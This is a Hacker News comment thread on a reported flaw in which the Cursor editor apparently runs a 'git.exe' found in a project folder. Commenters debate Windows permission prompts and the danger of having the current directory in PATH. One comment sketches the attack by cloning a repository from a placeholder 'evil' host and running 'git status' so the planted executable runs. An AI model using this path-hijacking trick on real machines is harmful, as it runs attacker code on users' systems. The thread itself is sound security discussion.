Remix.run Logo
Illniyar 3 hours ago

It's pretty weird for cursor to run arbitrary exe file without prompting, and alarming that the researchers did not get a proper response for months.

But the example with calculator is a bit misleading I think, you'll have to have a malicious exe already in the system and downloaded, and if cursor tried to run my understanding is that ACL should immediately kick in and you'll be asked for permission to run a new, unsigned app for the first time.

You'll have to have ACL disabled completely for this to be exploitable.

shitter 3 hours ago | parent | next [-]

And what'll the prompt say? "Do you want to run git.exe?"? I'll probably assume Cursor needs to run git but permissions got messed up somewhere and click right through that.

I haven't used Windows in a while so pardon if I'm missing something.

x3n0ph3n3 2 hours ago | parent | prev [-]

Same thing happens if I have a:

1) PS1 that displays the current git branch

2) Include the current directory in my PATH

Should we file a high severity CVE with bash now?

loumf 2 hours ago | parent | next [-]

It’s been known for decades that you should never put your current directory in your PATH. There are endless opportunities for vulnerabilities then. I learned this in college in the 80’s (by not following it and getting owned).

jwolfe 2 hours ago | parent | prev | next [-]

If bash placed the current directory in your PATH by default, then yes.

lyu07282 42 minutes ago | parent [-]

Could file a CVE with Microsoft then, cause thats kinda what cmd.exe is doing:

    > git clone git://evil evil
    > cd evil\
    > git status
The last line would execute git.exe from the cloned repo, wouldn't it?
Firehawke an hour ago | parent | prev | next [-]

Not with bash. If your distro is putting ./ into the path then that's absolutely a high severity CVE with your distro's config.

shitter 2 hours ago | parent | prev [-]

I would file a CVE for any program that places untrusted content into PATH and invokes non-fully qualified executable names - not for the shell.